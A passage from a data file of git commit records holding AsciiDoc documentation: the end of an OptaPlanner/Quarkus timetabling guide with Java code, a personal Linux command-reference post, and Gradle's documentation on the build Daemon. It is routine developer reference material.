every _step_ and every _move_ per step.\n\n== Summary\n\nCongratulations!\nYou have just developed a Quarkus application with https:\/\/www.optaplanner.org\/[OptaPlanner]!\n\n== Further improvements: Database and UI integration\n\nNow try adding database and UI integration:\n\n. Store `Timeslot`, `Room`, and `Lesson` in the database with link:hibernate-orm-panache[Hibernate and Panache].\n\n. link:rest-json[Expose them through REST].\n\n. Adjust the `TimeTableResource` to read and write a `TimeTable` instance in a single transaction\nand use those accordingly:\n+\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport javax.inject.Inject;\nimport javax.transaction.Transactional;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.POST;\nimport javax.ws.rs.Path;\n\nimport io.quarkus.panache.common.Sort;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.Room;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.acme.schooltimetabling.domain.Timeslot;\nimport org.optaplanner.core.api.score.ScoreManager;\nimport org.optaplanner.core.api.score.buildin.hardsoft.HardSoftScore;\nimport org.optaplanner.core.api.solver.SolverManager;\nimport org.optaplanner.core.api.solver.SolverStatus;\n\n@Path(\"\/timeTable\")\npublic class TimeTableResource {\n\n public static final Long SINGLETON_TIME_TABLE_ID = 1L;\n\n @Inject\n SolverManager<TimeTable, Long> solverManager;\n @Inject\n ScoreManager<TimeTable, HardSoftScore> scoreManager;\n\n \/\/ To try, open http:\/\/localhost:8080\/timeTable\n @GET\n public TimeTable getTimeTable() {\n \/\/ Get the solver status before loading the solution\n \/\/ to avoid the race condition that the solver terminates between them\n SolverStatus solverStatus = getSolverStatus();\n TimeTable solution = findById(SINGLETON_TIME_TABLE_ID);\n scoreManager.updateScore(solution); \/\/ Sets the score\n solution.setSolverStatus(solverStatus);\n return solution;\n }\n\n @POST\n @Path(\"\/solve\")\n public void solve() {\n solverManager.solveAndListen(SINGLETON_TIME_TABLE_ID,\n this::findById,\n this::save);\n }\n\n public SolverStatus getSolverStatus() {\n return solverManager.getSolverStatus(SINGLETON_TIME_TABLE_ID);\n }\n\n @POST\n @Path(\"\/stopSolving\")\n public void stopSolving() {\n solverManager.terminateEarly(SINGLETON_TIME_TABLE_ID);\n }\n\n @Transactional\n protected TimeTable findById(Long id) {\n if (!SINGLETON_TIME_TABLE_ID.equals(id)) {\n throw new IllegalStateException(\"There is no timeTable with id (\" + id + \").\");\n }\n \/\/ Occurs in a single transaction, so each initialized lesson references the same timeslot\/room instance\n \/\/ that is contained by the timeTable's timeslotList\/roomList.\n return new TimeTable(\n Timeslot.listAll(Sort.by(\"dayOfWeek\").and(\"startTime\").and(\"endTime\").and(\"id\")),\n Room.listAll(Sort.by(\"name\").and(\"id\")),\n Lesson.listAll(Sort.by(\"subject\").and(\"teacher\").and(\"studentGroup\").and(\"id\")));\n }\n\n @Transactional\n protected void save(TimeTable timeTable) {\n for (Lesson lesson : timeTable.getLessonList()) {\n \/\/ TODO this is awfully naive: optimistic locking causes issues if called by the SolverManager\n Lesson attachedLesson = Lesson.findById(lesson.getId());\n attachedLesson.setTimeslot(lesson.getTimeslot());\n attachedLesson.setRoom(lesson.getRoom());\n }\n }\n\n}\n----\n+\nFor simplicity's sake, this code handles only one `TimeTable` instance,\nbut it is straightforward to enable multi-tenancy and handle multiple `TimeTable` instances of different high schools in parallel.\n+\nThe `getTimeTable()` method returns the latest timetable from the database.\nIt uses the `ScoreManager` (which is automatically injected)\nto calculate the score of that timetable, so the UI can show the score.\n+\nThe `solve()` method starts a job to solve the current timetable and store the time slot and room assignments in the database.\nIt uses the `SolverManager.solveAndListen()` method to listen to intermediate best solutions\nand update the database accordingly.\nThis enables the UI to show progress while the backend is still solving.\n\n. Adjust the `TimeTableResourceTest` instance accordingly, now that the `solve()` method returns immediately.\nPoll for the latest solution until the solver finishes solving:\n+\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport javax.inject.Inject;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.api.Timeout;\nimport org.optaplanner.core.api.solver.SolverStatus;\n\nimport static org.junit.jupiter.api.Assertions.assertFalse;\nimport static org.junit.jupiter.api.Assertions.assertNotNull;\nimport static org.junit.jupiter.api.Assertions.assertTrue;\n\n@QuarkusTest\npublic class TimeTableResourceTest {\n\n @Inject\n TimeTableResource timeTableResource;\n\n @Test\n @Timeout(600_000)\n public void solveDemoDataUntilFeasible() throws InterruptedException {\n timeTableResource.solve();\n TimeTable timeTable = timeTableResource.getTimeTable();\n while (timeTable.getSolverStatus() != SolverStatus.NOT_SOLVING) {\n \/\/ Quick polling (not a Test Thread Sleep anti-pattern)\n \/\/ Test is still fast on fast machines and doesn't randomly fail on slow machines.\n Thread.sleep(20L);\n timeTable = timeTableResource.getTimeTable();\n }\n assertFalse(timeTable.getLessonList().isEmpty());\n for (Lesson lesson : timeTable.getLessonList()) {\n assertNotNull(lesson.getTimeslot());\n assertNotNull(lesson.getRoom());\n }\n assertTrue(timeTable.getScore().isFeasible());\n }\n\n}\n----\n\n. Build an attractive web UI on top of these REST methods to visualize the timetable.\n\nTake a look at {quarkusQuickstartUrl}[the quickstart source code] to see how this all turns out.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe104b1c55f7f85c75b6bbf45df8321971f9efce","subject":"Update 2013-05-12-Linux-Notes.adoc","message":"Update 2013-05-12-Linux-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2013-05-12-Linux-Notes.adoc","new_file":"_posts\/2013-05-12-Linux-Notes.adoc","new_contents":"= Linux Notes\n:hp-image: penguin.png\n:author: jonny rhea\n:doctype: notes\n:encoding: utf-8\n:lang: en\n:toc: left\n:published_at: 2013-05-12\n:numbered:\n\n[index]\n== general commands\n=== find\nSearch the current dir (and below) for a file named sue:\n[source,bash]\n$ find . \u2013name sue\n\nSearch \/tmp and \/var for files named foo*bar modified in the last week: \n[source,bash]\n$ find \/tmp \/var \u2013mtime -7 -name foo\\*bar\n\nSearch the file system for files modified < 10 mins ago, excluding dirs and other special files:\n[source,bash]\n$ find \/ -mmin -10 \u2013type f\n\n=== watch\nUse the watch command to monitor a process every .1 secs\n\n[source,bash]\n----\nwatch -e -n .1 'if ps cax | grep -w 'foo'; then exit 0; else exit 1; fi'\n----\n\n[index]\n== linux system info\n\nreport file system disk space usage (human readable):\n----\n$ df -h\n----\n\nprocessor info:\n----\n$ more \/proc\/cpuinfo\n----\n\nmemory info:\n----\n$ more \/proc\/meminfo\n----\n\ncheck to see if Linux is 32 or 64bit:\n----\n$ getconf LONG_BIT\n----\n\ndistribution info:\n----\n$ lsb_release\n----\n\nlist all packages installed:\n----\n$ dpkg -l\n----\n\nfind the 25 largest dirs starting at the current dir:\n----\n$ du \u2013xk |sort \u2013n |tail -25\n----\n\nshow what processes are using which ports:\n----\n$ netstat -tulpn\n----\n\n[index]\n== linux ipc\n=== ipcs\n*provides information on system inter process communication.*\n\n----\n$ ipcs\n\n------ Shared Memory Segments --------\nkey shmid owner perms bytes nattch status \n0x6112703c 32769 me 666 15600 2 \n\n------ Semaphore Arrays --------\nkey semid owner perms nsems \n\n------ Message Queues --------\nkey msqid owner perms used-bytes messages \n\n----\n\n[TIP]\n====\nuse the following options to filter the information displayed:\n\n* m => shared memory\n* q => message queues\n* s => semaphores\n====\n\nto find out what process is attached to shared memory use the -p option:\n\n----\n$ ipcs -mp\n------ Shared Memory Creator\/Last-op --------\nshmid owner cpid lpid \n32769 me 3265 3290 \n\n$ ps -ef | grep 3290\n 3290 3289 1 17:28 ? 00:00:12 \/usr\/local\/java\/bin\/java -jar ~\/foo\/foo.jar bar \n 11587 3290 3 17:41 ? 00:00:00 ~\/foo\/bar\n----\n\n=== ipcrm\n*use this command to remove shared memory, message queue, or semaphore.*\n\nremove shared memory by id\n---\n$ ipcs -m <shmid>\n---\n\nremove shared memory by key\n---\n$ ipcs -M <key>\n---\n\n[index]\n== linux system configuration\ncheck and repair filesystem:\n----\n$ fsck \/dev\/sda1\n----\n\nchange the frequency of filesys checks on startup:\n----\n$ tune2fs \u2013c <some number> \/dev\/sda1\n----\n\nto change the login manager edit:\n****\n*\/etc\/X11\/default-display-manager*\n****\n\nif your mac address changes edit or delete:\n****\n*\/etc\/udev\/rules.d\/70-persistent-net.rules*\n****\n\ndisable filesys checks by changing the last number in line to 0:\n****\n*\/etc\/fstab*\n----\n# <file system> <mount point> <type> <options> <dump> <pass>\n# performs filesys check every 30 startups\n\/dev\/sda1 \/mnt\/foo ext4 defaults 0 30 \n# filesys checks disabled\n\/dev\/sdb1 \/mnt\/bar ext4 defaults 0 0\n----\n****\n\nTo grant passwordless rsh:\n****\n*hosts.equiv* +\n----\n<computer name> <user name>\n----\n****\nCreate ssh key (rsa):\n----\n$ cd ~\/.ssh\n$ ssh-keygen \u2013t rsa\n$ ssh-add <file>\n----\n[index]\n== linux binutils\n=== objdump\n*display info from an object file(s).*\n\nbasic syntax:\n----\n$ objdump <options> file\n----\n\ndisplay the contents of the overall file header:\n----\n$ objdump \u2013f foo\n\nfoo: file format elf32-i386\narchitecture: i386, flags 0x00000112:\nEXEC_P, HAS_SYMS, D_PAGED\nstart address 0x0804be34\n----\n\ndisplay object format specific file header contents:\n----\n$ objdump -p foo\n\nfoo: file format elf32-i386\n\nProgram Header:\n PHDR off 0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2\n filesz 0x00000120 memsz 0x00000120 flags r-x\n INTERP off 0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0\n filesz 0x00000013 memsz 0x00000013 flags r--\n(...)\nDynamic Section:\n NEEDED libc.so.6\n INIT 0x080494a0\n FINI 0x0805a02c\n GNU_HASH 0x080481ac\n STRTAB 0x080489b8\n(...)\nVersion References:\n required from libc.so.6:\n 0x09691f73 0x00 10 GLIBC_2.1.3\n 0x0d696912 0x00 09 GLIBC_2.2\n 0x09691a73 0x00 07 GLIBC_2.2.3\n(...)\n----\n\n=== nm\n*provides info on the symbols used in an object file or executable. by default, nm shows the symbol: value, type and name.*\n\nbasic syntax:\n----\n$ nm \n----\n\n[NOTE]\n====\nif no file is provided, nm will inspect a.out\n====\n\ndisplay default information on executable (or object file):\n----\n$ nm foo\n----\n\ndisplay all the symbols in an executable:\n----\n$ nm -n foo\n----\n\ndisplay information about the size of a particular symbol, bar:\n----\n$ nm -n foo -S | grep bar\n----\n\nonly display information on external symbols:\n----\n$ nm -g foo\n----\n\n[index]\n== other utils\n=== file\n*get basic file information on a file(s).*\n\nbasic syntax:\n----\n$ file file\n----\n\nexample:\n----\n$ file foo\n\nfoo: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU\/Linux 2.6.24, stripped\n----\n","old_contents":"= Linux Notes\n:author: jonny rhea\n:doctype: notes\n:encoding: utf-8\n:lang: en\n:toc: left\n:published_at: 2013-05-12\n:numbered:\n\n[index]\n== general commands\n=== find\nSearch the current dir (and below) for a file named sue:\n[source,bash]\n$ find . \u2013name sue\n\nSearch \/tmp and \/var for files named foo*bar modified in the last week: \n[source,bash]\n$ find \/tmp \/var \u2013mtime -7 -name foo\\*bar\n\nSearch the file system for files modified < 10 mins ago, excluding dirs and other special files:\n[source,bash]\n$ find \/ -mmin -10 \u2013type f\n\n=== watch\nUse the watch command to monitor a process every .1 secs\n\n[source,bash]\n----\nwatch -e -n .1 'if ps cax | grep -w 'foo'; then exit 0; else exit 1; fi'\n----\n\n[index]\n== linux system info\n\nreport file system disk space usage (human readable):\n----\n$ df -h\n----\n\nprocessor info:\n----\n$ more \/proc\/cpuinfo\n----\n\nmemory info:\n----\n$ more \/proc\/meminfo\n----\n\ncheck to see if Linux is 32 or 64bit:\n----\n$ getconf LONG_BIT\n----\n\ndistribution info:\n----\n$ lsb_release\n----\n\nlist all packages installed:\n----\n$ dpkg -l\n----\n\nfind the 25 largest dirs starting at the current dir:\n----\n$ du \u2013xk |sort \u2013n |tail -25\n----\n\nshow what processes are using which ports:\n----\n$ netstat -tulpn\n----\n\n[index]\n== linux ipc\n=== ipcs\n*provides information on system inter process communication.*\n\n----\n$ ipcs\n\n------ Shared Memory Segments --------\nkey shmid owner perms bytes nattch status \n0x6112703c 32769 me 666 15600 2 \n\n------ Semaphore Arrays --------\nkey semid owner perms nsems \n\n------ Message Queues --------\nkey msqid owner perms used-bytes messages \n\n----\n\n[TIP]\n====\nuse the following options to filter the information displayed:\n\n* m => shared memory\n* q => message queues\n* s => semaphores\n====\n\nto find out what process is attached to shared memory use the -p option:\n\n----\n$ ipcs -mp\n------ Shared Memory Creator\/Last-op --------\nshmid owner cpid lpid \n32769 me 3265 3290 \n\n$ ps -ef | grep 3290\n 3290 3289 1 17:28 ? 00:00:12 \/usr\/local\/java\/bin\/java -jar ~\/foo\/foo.jar bar \n 11587 3290 3 17:41 ? 00:00:00 ~\/foo\/bar\n----\n\n=== ipcrm\n*use this command to remove shared memory, message queue, or semaphore.*\n\nremove shared memory by id\n---\n$ ipcs -m <shmid>\n---\n\nremove shared memory by key\n---\n$ ipcs -M <key>\n---\n\n[index]\n== linux system configuration\ncheck and repair filesystem:\n----\n$ fsck \/dev\/sda1\n----\n\nchange the frequency of filesys checks on startup:\n----\n$ tune2fs \u2013c <some number> \/dev\/sda1\n----\n\nto change the login manager edit:\n****\n*\/etc\/X11\/default-display-manager*\n****\n\nif your mac address changes edit or delete:\n****\n*\/etc\/udev\/rules.d\/70-persistent-net.rules*\n****\n\ndisable filesys checks by changing the last number in line to 0:\n****\n*\/etc\/fstab*\n----\n# <file system> <mount point> <type> <options> <dump> <pass>\n# performs filesys check every 30 startups\n\/dev\/sda1 \/mnt\/foo ext4 defaults 0 30 \n# filesys checks disabled\n\/dev\/sdb1 \/mnt\/bar ext4 defaults 0 0\n----\n****\n\nTo grant passwordless rsh:\n****\n*hosts.equiv* +\n----\n<computer name> <user name>\n----\n****\nCreate ssh key (rsa):\n----\n$ cd ~\/.ssh\n$ ssh-keygen \u2013t rsa\n$ ssh-add <file>\n----\n[index]\n== linux binutils\n=== objdump\n*display info from an object file(s).*\n\nbasic syntax:\n----\n$ objdump <options> file\n----\n\ndisplay the contents of the overall file header:\n----\n$ objdump \u2013f foo\n\nfoo: file format elf32-i386\narchitecture: i386, flags 0x00000112:\nEXEC_P, HAS_SYMS, D_PAGED\nstart address 0x0804be34\n----\n\ndisplay object format specific file header contents:\n----\n$ objdump -p foo\n\nfoo: file format elf32-i386\n\nProgram Header:\n PHDR off 0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2\n filesz 0x00000120 memsz 0x00000120 flags r-x\n INTERP off 0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0\n filesz 0x00000013 memsz 0x00000013 flags r--\n(...)\nDynamic Section:\n NEEDED libc.so.6\n INIT 0x080494a0\n FINI 0x0805a02c\n GNU_HASH 0x080481ac\n STRTAB 0x080489b8\n(...)\nVersion References:\n required from libc.so.6:\n 0x09691f73 0x00 10 GLIBC_2.1.3\n 0x0d696912 0x00 09 GLIBC_2.2\n 0x09691a73 0x00 07 GLIBC_2.2.3\n(...)\n----\n\n=== nm\n*provides info on the symbols used in an object file or executable. by default, nm shows the symbol: value, type and name.*\n\nbasic syntax:\n----\n$ nm \n----\n\n[NOTE]\n====\nif no file is provided, nm will inspect a.out\n====\n\ndisplay default information on executable (or object file):\n----\n$ nm foo\n----\n\ndisplay all the symbols in an executable:\n----\n$ nm -n foo\n----\n\ndisplay information about the size of a particular symbol, bar:\n----\n$ nm -n foo -S | grep bar\n----\n\nonly display information on external symbols:\n----\n$ nm -g foo\n----\n\n[index]\n== other utils\n=== file\n*get basic file information on a file(s).*\n\nbasic syntax:\n----\n$ file file\n----\n\nexample:\n----\n$ file foo\n\nfoo: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU\/Linux 2.6.24, stripped\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e9f7ecc082599f982b06ccbbf9fccff801eed1ca","subject":"Removed out-dated advice about disabling the daemon for ephemeral CI builds.","message":"Removed out-dated advice about disabling the daemon for ephemeral CI builds.\n","repos":"blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/gradle_daemon.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/gradle_daemon.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[gradle_daemon]]\n= The Gradle Daemon\n\n[quote, Wikipedia]\nA daemon is a computer program that runs as a background process, rather than being under the direct control of an interactive user.\n\nGradle runs on the Java Virtual Machine (JVM) and uses several supporting libraries that require a non-trivial initialization time. As a result, it can sometimes seem a little slow to start. The solution to this problem is the Gradle _Daemon_: a long-lived background process that executes your builds much more quickly than would otherwise be the case. We accomplish this by avoiding the expensive bootstrapping process as well as leveraging caching, by keeping data about your project in memory. Running Gradle builds with the Daemon is no different than without. Simply configure whether you want to use it or not - everything else is handled transparently by Gradle.\n\n\n[[sec:why_the_daemon]]\n== Why the Gradle Daemon is important for performance\n\nThe Daemon is a long-lived process, so not only are we able to avoid the cost of JVM startup for every build, but we are able to cache information about project structure, files, tasks, and more in memory.\n\nThe reasoning is simple: improve build speed by reusing computations from previous builds. However, the benefits are dramatic: we typically measure build times reduced by 15-75% on subsequent builds. We recommend profiling your build by using `--profile` to get a sense of how much impact the Gradle Daemon can have for you.\n\nThe Gradle Daemon is enabled by default starting with Gradle 3.0, so you don't have to do anything to benefit from it.\n\n[[sec:status]]\n== Running Daemon Status\n\nTo get a list of running Gradle Daemons and their statuses use the `--status` command.\n\nSample output:\n[source]\n----\n PID VERSION STATUS\n 28411 3.0 IDLE\n 34247 3.0 BUSY\n----\n\n\nCurrently, a given Gradle version can only connect to daemons of the same version. This means the status output will only show Daemons for the version of Gradle being invoked and not for any other versions. Future versions of Gradle will lift this constraint and will show the running Daemons for all versions of Gradle.\n\n[[sec:disabling_the_daemon]]\n== Disabling the Daemon\n\nThe Gradle Daemon is enabled by default, and we recommend always enabling it. There are several ways to disable the Daemon, but the most common one is to add the line\n\n[source]\n----\norg.gradle.daemon=false\n----\n\nto the file `\u00abUSER_HOME\u00bb\/.gradle\/gradle.properties`, where `\u00abUSER_HOME\u00bb` is your home directory. That\u2019s typically one of the following, depending on your platform:\n\n* `C:\\Users\\<username>` (Windows Vista & 7+)\n* `\/Users\/<username>` (macOS)\n* `\/home\/<username>` (Linux)\n\nIf that file doesn\u2019t exist, just create it using a text editor. You can find details of other ways to disable (and enable) the Daemon in <<#daemon_faq,Daemon FAQ>> further down. That section also contains more detailed information on how the Daemon works.\n\nNote that having the Daemon enabled, all your builds will take advantage of the speed boost, regardless of the version of Gradle a particular build uses.\n\n[TIP]\n.Continuous integration\n====\n\nSince Gradle 3.0, we enable Daemon by default and recommend using it for both developers' machines and Continuous Integration servers. However, if you suspect that Daemon makes your CI builds unstable, you can disable it to use a fresh runtime for each build since the runtime is _completely_ isolated from any previous builds.\n\n====\n\n\n[[sec:stopping_an_existing_daemon]]\n== Stopping an existing Daemon\n\nAs mentioned, the Daemon is a background process. You needn\u2019t worry about a build up of Gradle processes on your machine, though. Every Daemon monitors its memory usage compared to total system memory and will stop itself if idle when available system memory is low. If you want to explicitly stop running Daemon processes for any reason, just use the command `gradle --stop`.\n\nThis will terminate all Daemon processes that were started with the same version of Gradle used to execute the command. If you have the Java Development Kit (JDK) installed, you can easily verify that a Daemon has stopped by running the `jps` command. You\u2019ll see any running Daemons listed with the name `GradleDaemon`.\n\n[[daemon_faq]]\n== FAQ\n\n\n[[sec:ways_to_disable_gradle_daemon]]\n=== How do I disable the Gradle Daemon?\n\nThere are two recommended ways to disable the Daemon persistently for an environment:\n\n* Via environment variables: add the flag `-Dorg.gradle.daemon=false` to the `GRADLE_OPTS` environment variable\n* Via properties file: add `org.gradle.daemon=false` to the `\u00abGRADLE_USER_HOME\u00bb\/gradle.properties` file\n\n[NOTE]\n====\n\nNote, `\u00abGRADLE_USER_HOME\u00bb` defaults to `\u00abUSER_HOME\u00bb\/.gradle`, where `\u00abUSER_HOME\u00bb` is the home directory of the current user. This location can be configured via the `-g` and `--gradle-user-home` command line switches, as well as by the `GRADLE_USER_HOME` environment variable and `org.gradle.user.home` JVM system property.\n\n====\n\nBoth approaches have the same effect. Which one to use is up to personal preference. Most Gradle users choose the second option and add the entry to the user `gradle.properties` file.\n\nOn Windows, this command will disable the Daemon for the current user:\n\n[source]\n----\n(if not exist \"%USERPROFILE%\/.gradle\" mkdir \"%USERPROFILE%\/.gradle\") && (echo. >> \"%USERPROFILE%\/.gradle\/gradle.properties\" && echo org.gradle.daemon=false >> \"%USERPROFILE%\/.gradle\/gradle.properties\")\n----\n\nOn UNIX-like operating systems, the following Bash shell command will disable the Daemon for the current user:\n\n[source,bash]\n----\nmkdir -p ~\/.gradle && echo \"org.gradle.daemon=false\" >> ~\/.gradle\/gradle.properties\n----\n\nOnce the Daemon is disabled for a build environment in this way, a Gradle Daemon will not be started unless explicitly requested using the `--daemon` option.\n\nThe `--daemon` and `--no-daemon` command line options enable and disable usage of the Daemon for individual build invocations when using the Gradle command line interface. These command line options have the _highest_ precedence when considering the build environment. Typically, it is more convenient to enable the Daemon for an environment (e.g. a user account) so that all builds use the Daemon without requiring to remember to supply the `--daemon` option.\n\n[[sec:why_is_there_more_than_one_daemon_process_on_my_machine]]\n=== Why is there more than one Daemon process on my machine?\n\nThere are several reasons why Gradle will create a new Daemon, instead of using one that is already running. The basic rule is that Gradle will start a new Daemon if there are no existing idle or compatible Daemons available. Gradle will kill any Daemon that has been idle for 3 hours or more, so you don't have to worry about cleaning them up manually.\n\nidle::\nAn idle Daemon is one that is not currently executing a build or doing other useful work.\ncompatible::\nA compatible Daemon is one that can (or can be made to) meet the requirements of the requested build environment. The Java runtime used to execute the build is an example aspect of the build environment. Another example is the set of JVM system properties required by the build runtime.\n\n\nSome aspects of the requested build environment may not be met by an Daemon. If the Daemon is running with a Java 8 runtime, but the requested environment calls for Java 10, then the Daemon is not compatible and another must be started. Moreover, certain properties of a Java runtime cannot be changed once the JVM has started. For example, it is not possible to change the memory allocation (e.g. `-Xmx1024m`), default text encoding, default locale, etc of a running JVM.\n\nThe \u201crequested build environment\u201d is typically constructed implicitly from aspects of the build client\u2019s (e.g. Gradle command line client, IDE etc.) environment and explicitly via command line switches and settings. See <<build_environment.adoc#build_environment,Build Environment>> for details on how to specify and control the build environment.\n\nThe following JVM system properties are effectively immutable. If the requested build environment requires any of these properties, with a different value than a Daemon\u2019s JVM has for this property, the Daemon is not compatible.\n\n* file.encoding\n* user.language\n* user.country\n* user.variant\n* java.io.tmpdir\n* javax.net.ssl.keyStore\n* javax.net.ssl.keyStorePassword\n* javax.net.ssl.keyStoreType\n* javax.net.ssl.trustStore\n* javax.net.ssl.trustStorePassword\n* javax.net.ssl.trustStoreType\n* com.sun.management.jmxremote\n\nThe following JVM attributes, controlled by startup arguments, are also effectively immutable. The corresponding attributes of the requested build environment and the Daemon\u2019s environment must match exactly in order for a Daemon to be compatible.\n\n* The maximum heap size (i.e. the -Xmx JVM argument)\n* The minimum heap size (i.e. the -Xms JVM argument)\n* The boot classpath (i.e. the -Xbootclasspath argument)\n* The \u201cassertion\u201d status (i.e. the -ea argument)\n\nThe required Gradle version is another aspect of the requested build environment. Daemon processes are coupled to a specific Gradle runtime. Working on multiple Gradle projects during a session that use different Gradle versions is a common reason for having more than one running Daemon process.\n\n[[sec:how_much_memory_does_the_daemon_use_and_can_i_give_it_more]]\n=== How much memory does the Daemon use and can I give it more?\n\nIf the requested build environment does not specify a maximum heap size, the Daemon will use up to 512MB of heap. It will use the JVM's default minimum heap size. 512MB is more than enough for most builds. Larger builds with hundreds of subprojects, lots of configuration, and source code may require, or perform better, with more memory.\n\nTo increase the amount of memory the Daemon can use, specify the appropriate flags as part of the requested build environment. Please see <<build_environment.adoc#build_environment,Build Environment>> for details.\n\n[[sec:how_can_i_stop_a_daemon]]\n=== How can I stop a Daemon?\n\nDaemon processes will automatically terminate themselves after 3 hours of inactivity or less. If you wish to stop a Daemon process before this, you can either kill the process via your operating system or run the `gradle --stop` command. The `--stop` switch causes Gradle to request that _all_ running Daemon processes, _of the same Gradle version used to run the command_, terminate themselves.\n\n[[sec:what_can_go_wrong_with_daemon]]\n=== What can go wrong with Daemon?\n\nConsiderable engineering effort has gone into making the Daemon robust, transparent and unobtrusive during day to day development. However, Daemon processes can occasionally be corrupted or exhausted. A Gradle build executes arbitrary code from multiple sources. While Gradle itself is designed for and heavily tested with the Daemon, user build scripts and third party plugins can destabilize the Daemon process through defects such as memory leaks or global state corruption.\n\nIt is also possible to destabilize the Daemon (and build environment in general) by running builds that do not release resources correctly. This is a particularly poignant problem when using Microsoft Windows as it is less forgiving of programs that fail to close files after reading or writing.\n\nGradle actively monitors heap usage and attempts to detect when a leak is starting to exhaust the available heap space in the daemon. When it detects a problem, the Gradle daemon will finish the currently running build and proactively restart the daemon on the next build. This monitoring is enabled by default, but can be disabled by setting the `org.gradle.daemon.performance.enable-monitoring` system property to false.\n\nIf it is suspected that the Daemon process has become unstable, it can simply be killed. Recall that the `--no-daemon` switch can be specified for a build to prevent use of the Daemon. This can be useful to diagnose whether or not the Daemon is actually the culprit of a problem.\n\n[[sec:tools_and_ides]]\n== Tools & IDEs\n\nThe <<embedding.adoc#embedding,Gradle Tooling API>> that is used by IDEs and other tools to integrate with Gradle _always_ uses the Gradle Daemon to execute builds. If you are executing Gradle builds from within your IDE you are using the Gradle Daemon and do not need to enable it for your environment.\n\n[[sec:how_does_the_gradle_daemon_make_builds_faster]]\n== How does the Gradle Daemon make builds faster?\n\nThe Gradle Daemon is a _long lived_ build process. In between builds it waits idly for the next build. This has the obvious benefit of only requiring Gradle to be loaded into memory once for multiple builds, as opposed to once for each build. This in itself is a significant performance optimization, but that's not where it stops.\n\nA significant part of the story for modern JVM performance is runtime code optimization. For example, HotSpot (the JVM implementation provided by Oracle and used as the basis of OpenJDK) applies optimization to code while it is running. The optimization is progressive and not instantaneous. That is, the code is progressively optimized during execution which means that subsequent builds can be faster purely due to this optimization process. Experiments with HotSpot have shown that it takes somewhere between 5 and 10 builds for optimization to stabilize. The difference in perceived build time between the first build and the 10th for a Daemon can be quite dramatic.\n\nThe Daemon also allows more effective in memory caching across builds. For example, the classes needed by the build (e.g. plugins, build scripts) can be held in memory between builds. Similarly, Gradle can maintain in-memory caches of build data such as the hashes of task inputs and outputs, used for incremental building.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[gradle_daemon]]\n= The Gradle Daemon\n\n[quote, Wikipedia]\nA daemon is a computer program that runs as a background process, rather than being under the direct control of an interactive user.\n\nGradle runs on the Java Virtual Machine (JVM) and uses several supporting libraries that require a non-trivial initialization time. As a result, it can sometimes seem a little slow to start. The solution to this problem is the Gradle _Daemon_: a long-lived background process that executes your builds much more quickly than would otherwise be the case. We accomplish this by avoiding the expensive bootstrapping process as well as leveraging caching, by keeping data about your project in memory. Running Gradle builds with the Daemon is no different than without. Simply configure whether you want to use it or not - everything else is handled transparently by Gradle.\n\n\n[[sec:why_the_daemon]]\n== Why the Gradle Daemon is important for performance\n\nThe Daemon is a long-lived process, so not only are we able to avoid the cost of JVM startup for every build, but we are able to cache information about project structure, files, tasks, and more in memory.\n\nThe reasoning is simple: improve build speed by reusing computations from previous builds. However, the benefits are dramatic: we typically measure build times reduced by 15-75% on subsequent builds. We recommend profiling your build by using `--profile` to get a sense of how much impact the Gradle Daemon can have for you.\n\nThe Gradle Daemon is enabled by default starting with Gradle 3.0, so you don't have to do anything to benefit from it.\n\nIf you run CI builds in ephemeral environments (such as containers) that do not reuse any processes, use of the Daemon will slightly decrease performance (due to caching additional information) for no benefit, and may be disabled.\n\n[[sec:status]]\n== Running Daemon Status\n\nTo get a list of running Gradle Daemons and their statuses use the `--status` command.\n\nSample output:\n[source]\n----\n PID VERSION STATUS\n 28411 3.0 IDLE\n 34247 3.0 BUSY\n----\n\n\nCurrently, a given Gradle version can only 